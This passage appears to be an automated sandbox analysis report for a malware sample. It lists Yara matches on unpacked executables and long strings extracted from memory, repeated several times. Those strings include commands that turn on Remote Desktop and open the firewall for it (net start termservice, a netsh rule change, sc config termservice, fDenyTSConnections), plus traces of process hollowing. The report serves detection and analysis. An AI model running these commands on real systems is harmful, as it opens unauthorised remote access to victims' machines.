Source: Yara match	File source: 35.2.Updater.exe.4292be0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.AutoIt3.exe.4382be0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002A.00000002.2499336033.000000000437C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.2409431093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2411065560.00000000044DC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2239705432.000000000428C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: AutoIt3.exe	Binary or memory string: WIN_81
Source: AutoIt3.exe	Binary or memory string: WIN_XP
Source: AutoIt3.exe	Binary or memory string: WIN_XPe
Source: AutoIt3.exe	Binary or memory string: WIN_VISTA
Source: AutoIt3.exe, 0000002A.00000003.2496893980.0000000004C20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 15, 1USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.-\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: AutoIt3.exe	Binary or memory string: WIN_7
Source: AutoIt3.exe	Binary or memory string: WIN_8

Remote Access Functionality

Contains functionality to start a terminal service

Source: Updater.exe, 00000023.00000003.2237151080.00000000049E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: Updater.exe, 00000023.00000003.2237151080.00000000049E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new length: genericiostreamiostream stream errorFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set805f14f85ee1dae0f3315e33e81c2a42cb36de7f397799e419deb9caf3a96a89322a8d6d5a45058fa30d5968f8d3f9443ad8a7JIODBcl2FnIVRC8mRbI=IobnPxWw8nRadzNvWa1f6qJdizVy2Ht=KHYBCp==RnUq2AZqGHVx4J==IHPx4J==WI8qCcJ2SngmQg==OSb54Q0qFqZU2Q==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLwK2YaWF==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhLQSi7mFJdGZhgutw66pc3UzBRSLm3gWY7E==RbPyVRVpyvdACJNDUEpHNu1pF7w9RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLw cPzPzCpGDM7RwDAPWOe61Q=RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhKVmi6KA7Umch4yNo7A==GKPYHOONOocwVUBuOI==UtzB3t==Rt3YLt==OPPZ8LKaacGa RKa9SGaVbeaVMCa vGaaLYaWvUaVMSa9wSa9R7a 9U=VSDqPv h6KBY12BehuXa6Kp0VSDqPv h6KA=VRru3v h6KA=Wsy=WIy=WIC=WIG=QLzu2 ==8wL53wtsFA==8wL53AR3FCb=WMbqWvrxVRVp wGC9MHubbfBISz61P0XMvG+MvK+IQvx4Pim6rQlHnmwFl==cp==GcPz1QV6MF== Rbq2zBwGm9aeGA=8RPD2f0pGDMk2GBhORP5JfKX513bX3poiyNjM0Xeft==RwDAPWOe6YV8gGJ2NKTGKUVdO6ccgHh7heM=NMTu3fJ=PRzE3z0v76xVLEB739==OKHKLt==RvzzPzJdO6Z gXNeizc=Ov3o4zdvCJhb1g==NKTMJoSBLzdXS0BJ2WRQhedQ9U==Nbf5Pz0jT09a2XM=Qb3D4zdrRR3B1zdwNR3y2VWsSRfzHz0jT09a2XM=JsyDCsVYHngURQ== bC=aRC=NR3z4z0r8G5KhXFaTatj80pSeUrj4nJmWb3D2L6hS1V8RyF8gVNkTKxqiQQvCSTkIHUyBL5qAFjI2V XT09QOUVehVtl76dSeTZwFiud9SDyBPWe8KIXLG97gOMZCqJ hDukFyud8Lrq2fKqTX49F6UPGVdr8KZkgC5JjPtbImt gEru2WG9avfA2bdsS7VbgC5oizBbS0SFGdQMAFiyBL5qFW4=IHUSs ==MSHo3c5uIbjBPp==NR3z4z0r8G5KhXFaTat87LtkeTDj5Gem9839BQi08C5ce3NiQPNo6KNm2ZZmQWJ=RQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3T2cihzNQT1BG2TRnOEGm9Mv64z0vNqJj2Q==NR3y3A0XT1NE1W5aVLDoPz0jT6lfdmxhgOXl7Lxqg0H35n7VbMiBCMNwHHYSQzkUQN0=IMPz1PSsTKYjRQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3YW9eiyNaPqdc3TZeH02FSuDUJyCTMYVvW1A=RQfYLx0KRIRlenVngUpJT1IoQAveL2OpabfoPQS KqJpdWRtfPFm6KxX1CPrQGOmSbfpPPdGLE==UsuBCwF=OvPrOQ0p8JRbgHVege6pFp K3UDx3HOR8L3zOvPrOQ0p8JRbgHVege6pFpdK3UDx3HOR8L3zRP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSGlJeW K7ZofmZjixRb7rFhfZU=RwDAPA0g8I98eWY=J9uCEJ==J9uDC ==J9uCD ==J9uDDJ==NSPD3f0r8INRdWB Up==L9ia cPzPzCpGDMk2XlaIRmlFcLm3Vyo50BiLCcbNu1f6WsaF8urzbGX505be3ZPNvw7DmQ93DLuzA==G8SlHQmm8GM=F8urzbGvT087FrSryt==Rv38PQOw5KZieC9ajyM=ILP9PPSY8KplenFkgyd 9Wtq3TRx5GOq8L8zPPVdFY3feGY6N9==F6== Rb64zWs8687OXQ6QPI7GE== SKd3p== bzzPzdqABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Keyboard Layout\Preload0000041900000422000004230000043fSystemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice start= aut
Source: Updater.exe, 00000023.00000002.2239787208.0000000004300000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: Updater.exe, 00000023.00000002.2239787208.0000000004300000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new length: genericiostreamiostream stream errorFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set805f14f85ee1dae0f3315e33e81c2a42cb36de7f397799e419deb9caf3a96a89322a8d6d5a45058fa30d5968f8d3f9443ad8a7JIODBcl2FnIVRC8mRbI=IobnPxWw8nRadzNvWa1f6qJdizVy2Ht=KHYBCp==RnUq2AZqGHVx4J==IHPx4J==WI8qCcJ2SngmQg==OSb54Q0qFqZU2Q==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLwK2YaWF==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhLQSi7mFJdGZhgutw66pc3UzBRSLm3gWY7E==RbPyVRVpyvdACJNDUEpHNu1pF7w9RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLw cPzPzCpGDM7RwDAPWOe61Q=RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhKVmi6KA7Umch4yNo7A==GKPYHOONOocwVUBuOI==UtzB3t==Rt3YLt==OPPZ8LKaacGa RKa9SGaVbeaVMCa vGaaLYaWvUaVMSa9wSa9R7a 9U=VSDqPv h6KBY12BehuXa6Kp0VSDqPv h6KA=VRru3v h6KA=Wsy=WIy=WIC=WIG=QLzu2 ==8wL53wtsFA==8wL53AR3FCb=WMbqWvrxVRVp wGC9MHubbfBISz61P0XMvG+MvK+IQvx4Pim6rQlHnmwFl==cp==GcPz1QV6MF== Rbq2zBwGm9aeGA=8RPD2f0pGDMk2GBhORP5JfKX513bX3poiyNjM0Xeft==RwDAPWOe6YV8gGJ2NKTGKUVdO6ccgHh7heM=NMTu3fJ=PRzE3z0v76xVLEB739==OKHKLt==RvzzPzJdO6Z gXNeizc=Ov3o4zdvCJhb1g==NKTMJoSBLzdXS0BJ2WRQhedQ9U==Nbf5Pz0jT09a2XM=Qb3D4zdrRR3B1zdwNR3y2VWsSRfzHz0jT09a2XM=JsyDCsVYHngURQ== bC=aRC=NR3z4z0r8G5KhXFaTatj80pSeUrj4nJmWb3D2L6hS1V8RyF8gVNkTKxqiQQvCSTkIHUyBL5qAFjI2V XT09QOUVehVtl76dSeTZwFiud9SDyBPWe8KIXLG97gOMZCqJ hDukFyud8Lrq2fKqTX49F6UPGVdr8KZkgC5JjPtbImt gEru2WG9avfA2bdsS7VbgC5oizBbS0SFGdQMAFiyBL5qFW4=IHUSs ==MSHo3c5uIbjBPp==NR3z4z0r8G5KhXFaTat87LtkeTDj5Gem9839BQi08C5ce3NiQPNo6KNm2ZZmQWJ=RQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3T2cihzNQT1BG2TRnOEGm9Mv64z0vNqJj2Q==NR3y3A0XT1NE1W5aVLDoPz0jT6lfdmxhgOXl7Lxqg0H35n7VbMiBCMNwHHYSQzkUQN0=IMPz1PSsTKYjRQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3YW9eiyNaPqdc3TZeH02FSuDUJyCTMYVvW1A=RQfYLx0KRIRlenVngUpJT1IoQAveL2OpabfoPQS KqJpdWRtfPFm6KxX1CPrQGOmSbfpPPdGLE==UsuBCwF=OvPrOQ0p8JRbgHVege6pFp K3UDx3HOR8L3zOvPrOQ0p8JRbgHVege6pFpdK3UDx3HOR8L3zRP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSGlJeW K7ZofmZjixRb7rFhfZU=RwDAPA0g8I98eWY=J9uCEJ==J9uDC ==J9uCD ==J9uDDJ==NSPD3f0r8INRdWB Up==L9ia cPzPzCpGDMk2XlaIRmlFcLm3Vyo50BiLCcbNu1f6WsaF8urzbGX505be3ZPNvw7DmQ93DLuzA==G8SlHQmm8GM=F8urzbGvT087FrSryt==Rv38PQOw5KZieC9ajyM=ILP9PPSY8KplenFkgyd 9Wtq3TRx5GOq8L8zPPVdFY3feGY6N9==F6== Rb64zWs8687OXQ6QPI7GE== SKd3p== bzzPzdqABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Keyboard Layout\Preload0000041900000422000004230000043fSystemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice start= aut
Source: Updater.exe, 00000023.00000003.2237303826.00000000047EC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: Updater.exe, 00000023.00000003.2237303826.00000000047EC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new length: genericiostreamiostream stream errorFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set805f14f85ee1dae0f3315e33e81c2a42cb36de7f397799e419deb9caf3a96a89322a8d6d5a45058fa30d5968f8d3f9443ad8a7JIODBcl2FnIVRC8mRbI=IobnPxWw8nRadzNvWa1f6qJdizVy2Ht=KHYBCp==RnUq2AZqGHVx4J==IHPx4J==WI8qCcJ2SngmQg==OSb54Q0qFqZU2Q==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLwK2YaWF==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhLQSi7mFJdGZhgutw66pc3UzBRSLm3gWY7E==RbPyVRVpyvdACJNDUEpHNu1pF7w9RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLw cPzPzCpGDM7RwDAPWOe61Q=RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhKVmi6KA7Umch4yNo7A==GKPYHOONOocwVUBuOI==UtzB3t==Rt3YLt==OPPZ8LKaacGa RKa9SGaVbeaVMCa vGaaLYaWvUaVMSa9wSa9R7a 9U=VSDqPv h6KBY12BehuXa6Kp0VSDqPv h6KA=VRru3v h6KA=Wsy=WIy=WIC=WIG=QLzu2 ==8wL53wtsFA==8wL53AR3FCb=WMbqWvrxVRVp wGC9MHubbfBISz61P0XMvG+MvK+IQvx4Pim6rQlHnmwFl==cp==GcPz1QV6MF== Rbq2zBwGm9aeGA=8RPD2f0pGDMk2GBhORP5JfKX513bX3poiyNjM0Xeft==RwDAPWOe6YV8gGJ2NKTGKUVdO6ccgHh7heM=NMTu3fJ=PRzE3z0v76xVLEB739==OKHKLt==RvzzPzJdO6Z gXNeizc=Ov3o4zdvCJhb1g==NKTMJoSBLzdXS0BJ2WRQhedQ9U==Nbf5Pz0jT09a2XM=Qb3D4zdrRR3B1zdwNR3y2VWsSRfzHz0jT09a2XM=JsyDCsVYHngURQ== bC=aRC=NR3z4z0r8G5KhXFaTatj80pSeUrj4nJmWb3D2L6hS1V8RyF8gVNkTKxqiQQvCSTkIHUyBL5qAFjI2V XT09QOUVehVtl76dSeTZwFiud9SDyBPWe8KIXLG97gOMZCqJ hDukFyud8Lrq2fKqTX49F6UPGVdr8KZkgC5JjPtbImt gEru2WG9avfA2bdsS7VbgC5oizBbS0SFGdQMAFiyBL5qFW4=IHUSs ==MSHo3c5uIbjBPp==NR3z4z0r8G5KhXFaTat87LtkeTDj5Gem9839BQi08C5ce3NiQPNo6KNm2ZZmQWJ=RQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3T2cihzNQT1BG2TRnOEGm9Mv64z0vNqJj2Q==NR3y3A0XT1NE1W5aVLDoPz0jT6lfdmxhgOXl7Lxqg0H35n7VbMiBCMNwHHYSQzkUQN0=IMPz1PSsTKYjRQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3YW9eiyNaPqdc3TZeH02FSuDUJyCTMYVvW1A=RQfYLx0KRIRlenVngUpJT1IoQAveL2OpabfoPQS KqJpdWRtfPFm6KxX1CPrQGOmSbfpPPdGLE==UsuBCwF=OvPrOQ0p8JRbgHVege6pFp K3UDx3HOR8L3zOvPrOQ0p8JRbgHVege6pFpdK3UDx3HOR8L3zRP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSGlJeW K7ZofmZjixRb7rFhfZU=RwDAPA0g8I98eWY=J9uCEJ==J9uDC ==J9uCD ==J9uDDJ==NSPD3f0r8INRdWB Up==L9ia cPzPzCpGDMk2XlaIRmlFcLm3Vyo50BiLCcbNu1f6WsaF8urzbGX505be3ZPNvw7DmQ93DLuzA==G8SlHQmm8GM=F8urzbGvT087FrSryt==Rv38PQOw5KZieC9ajyM=ILP9PPSY8KplenFkgyd 9Wtq3TRx5GOq8L8zPPVdFY3feGY6N9==F6== Rb64zWs8687OXQ6QPI7GE== SKd3p== bzzPzdqABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Keyboard Layout\Preload0000041900000422000004230000043fSystemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice start= aut
Source: AutoIt3.exe, 00000026.00000003.2408266551.0000000004A3C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: AutoIt3.exe, 00000026.00000003.2408266551.0000000004A3C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new length: genericiostreamiostream stream errorFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set805f14f85ee1dae0f3315e33e81c2a42cb36de7f397799e419deb9caf3a96a89322a8d6d5a45058fa30d5968f8d3f9443ad8a7JIODBcl2FnIVRC8mRbI=IobnPxWw8nRadzNvWa1f6qJdizVy2Ht=KHYBCp==RnUq2AZqGHVx4J==IHPx4J==WI8qCcJ2SngmQg==OSb54Q0qFqZU2Q==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLwK2YaWF==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhLQSi7mFJdGZhgutw66pc3UzBRSLm3gWY7E==RbPyVRVpyvdACJNDUEpHNu1pF7w9RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLw cPzPzCpGDM7RwDAPWOe61Q=RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhKVmi6KA7Umch4yNo7A==GKPYHOONOocwVUBuOI==UtzB3t==Rt3YLt==OPPZ8LKaacGa RKa9SGaVbeaVMCa vGaaLYaWvUaVMSa9wSa9R7a 9U=VSDqPv h6KBY12BehuXa6Kp0VSDqPv h6KA=VRru3v h6KA=Wsy=WIy=WIC=WIG=QLzu2 ==8wL53wtsFA==8wL53AR3FCb=WMbqWvrxVRVp wGC9MHubbfBISz61P0XMvG+MvK+IQvx4Pim6rQlHnmwFl==cp==GcPz1QV6MF== Rbq2zBwGm9aeGA=8RPD2f0pGDMk2GBhORP5JfKX513bX3poiyNjM0Xeft==RwDAPWOe6YV8gGJ2NKTGKUVdO6ccgHh7heM=NMTu3fJ=PRzE3z0v76xVLEB739==OKHKLt==RvzzPzJdO6Z gXNeizc=Ov3o4zdvCJhb1g==NKTMJoSBLzdXS0BJ2WRQhedQ9U==Nbf5Pz0jT09a2XM=Qb3D4zdrRR3B1zdwNR3y2VWsSRfzHz0jT09a2XM=JsyDCsVYHngURQ== bC=aRC=NR3z4z0r8G5KhXFaTatj80pSeUrj4nJmWb3D2L6hS1V8RyF8gVNkTKxqiQQvCSTkIHUyBL5qAFjI2V XT09QOUVehVtl76dSeTZwFiud9SDyBPWe8KIXLG97gOMZCqJ hDukFyud8Lrq2fKqTX49F6UPGVdr8KZkgC5JjPtbImt gEru2WG9avfA2bdsS7VbgC5oizBbS0SFGdQMAFiyBL5qFW4=IHUSs ==MSHo3c5uIbjBPp==NR3z4z0r8G5KhXFaTat87LtkeTDj5Gem9839BQi08C5ce3NiQPNo6KNm2ZZmQWJ=RQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3T2cihzNQT1BG2TRnOEGm9Mv64z0vNqJj2Q==NR3y3A0XT1NE1W5aVLDoPz0jT6lfdmxhgOXl7Lxqg0H35n7VbMiBCMNwHHYSQzkUQN0=IMPz1PSsTKYjRQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3YW9eiyNaPqdc3TZeH02FSuDUJyCTMYVvW1A=RQfYLx0KRIRlenVngUpJT1IoQAveL2OpabfoPQS KqJpdWRtfPFm6KxX1CPrQGOmSbfpPPdGLE==UsuBCwF=OvPrOQ0p8JRbgHVege6pFp K3UDx3HOR8L3zOvPrOQ0p8JRbgHVege6pFpdK3UDx3HOR8L3zRP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSGlJeW K7ZofmZjixRb7rFhfZU=RwDAPA0g8I98eWY=J9uCEJ==J9uDC ==J9uCD ==J9uDDJ==NSPD3f0r8INRdWB Up==L9ia cPzPzCpGDMk2XlaIRmlFcLm3Vyo50BiLCcbNu1f6WsaF8urzbGX505be3ZPNvw7DmQ93DLuzA==G8SlHQmm8GM=F8urzbGvT087FrSryt==Rv38PQOw5KZieC9ajyM=ILP9PPSY8KplenFkgyd 9Wtq3TRx5GOq8L8zPPVdFY3feGY6N9==F6== Rb64zWs8687OXQ6QPI7GE== SKd3p== bzzPzdqABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Keyboard Layout\Preload0000041900000422000004230000043fSystemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice start= aut
Source: AutoIt3.exe, 00000026.00000003.2408112931.0000000004C30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: AutoIt3.exe, 00000026.00000003.2408112931.0000000004C30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new length: genericiostreamiostream stream errorFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set805f14f85ee1dae0f3315e33e81c2a42cb36de7f397799e419deb9caf3a96a89322a8d6d5a45058fa30d5968f8d3f9443ad8a7JIODBcl2FnIVRC8mRbI=IobnPxWw8nRadzNvWa1f6qJdizVy2Ht=KHYBCp==RnUq2AZqGHVx4J==IHPx4J==WI8qCcJ2SngmQg==OSb54Q0qFqZU2Q==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLwK2YaWF==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhLQSi7mFJdGZhgutw66pc3UzBRSLm3gWY7E==RbPyVRVpyvdACJNDUEpHNu1pF7w9RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLw cPzPzCpGDM7RwDAPWOe61Q=RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhKVmi6KA7Umch4yNo7A==GKPYHOONOocwVUBuOI==UtzB3t==Rt3YLt==OPPZ8LKaacGa RKa9SGaVbeaVMCa vGaaLYaWvUaVMSa9wSa9R7a 9U=VSDqPv h6KBY12BehuXa6Kp0VSDqPv h6KA=VRru3v h6KA=Wsy=WIy=WIC=WIG=QLzu2 ==8wL53wtsFA==8wL53AR3FCb=WMbqWvrxVRVp wGC9MHubbfBISz61P0XMvG+MvK+IQvx4Pim6rQlHnmwFl==cp==GcPz1QV6MF== Rbq2zBwGm9aeGA=8RPD2f0pGDMk2GBhORP5JfKX513bX3poiyNjM0Xeft==RwDAPWOe6YV8gGJ2NKTGKUVdO6ccgHh7heM=NMTu3fJ=PRzE3z0v76xVLEB739==OKHKLt==RvzzPzJdO6Z gXNeizc=Ov3o4zdvCJhb1g==NKTMJoSBLzdXS0BJ2WRQhedQ9U==Nbf5Pz0jT09a2XM=Qb3D4zdrRR3B1zdwNR3y2VWsSRfzHz0jT09a2XM=JsyDCsVYHngURQ== bC=aRC=NR3z4z0r8G5KhXFaTatj80pSeUrj4nJmWb3D2L6hS1V8RyF8gVNkTKxqiQQvCSTkIHUyBL5qAFjI2V XT09QOUVehVtl76dSeTZwFiud9SDyBPWe8KIXLG97gOMZCqJ hDukFyud8Lrq2fKqTX49F6UPGVdr8KZkgC5JjPtbImt gEru2WG9avfA2bdsS7VbgC5oizBbS0SFGdQMAFiyBL5qFW4=IHUSs ==MSHo3c5uIbjBPp==NR3z4z0r8G5KhXFaTat87LtkeTDj5Gem9839BQi08C5ce3NiQPNo6KNm2ZZmQWJ=RQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3T2cihzNQT1BG2TRnOEGm9Mv64z0vNqJj2Q==NR3y3A0XT1NE1W5aVLDoPz0jT6lfdmxhgOXl7Lxqg0H35n7VbMiBCMNwHHYSQzkUQN0=IMPz1PSsTKYjRQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3YW9eiyNaPqdc3TZeH02FSuDUJyCTMYVvW1A=RQfYLx0KRIRlenVngUpJT1IoQAveL2OpabfoPQS KqJpdWRtfPFm6KxX1CPrQGOmSbfpPPdGLE==UsuBCwF=OvPrOQ0p8JRbgHVege6pFp K3UDx3HOR8L3zOvPrOQ0p8JRbgHVege6pFpdK3UDx3HOR8L3zRP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSGlJeW K7ZofmZjixRb7rFhfZU=RwDAPA0g8I98eWY=J9uCEJ==J9uDC ==J9uCD ==J9uDDJ==NSPD3f0r8INRdWB Up==L9ia cPzPzCpGDMk2XlaIRmlFcLm3Vyo50BiLCcbNu1f6WsaF8urzbGX505be3ZPNvw7DmQ93DLuzA==G8SlHQmm8GM=F8urzbGvT087FrSryt==Rv38PQOw5KZieC9ajyM=ILP9PPSY8KplenFkgyd 9Wtq3TRx5GOq8L8zPPVdFY3feGY6N9==F6== Rb64zWs8687OXQ6QPI7GE== SKd3p== bzzPzdqABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Keyboard Layout\Preload0000041900000422000004230000043fSystemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice start= aut
Source: AutoIt3.exe, 00000026.00000002.2411185727.0000000004550000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: AutoIt3.exe, 00000026.00000002.2411185727.0000000004550000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new length: genericiostreamiostream stream errorFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit 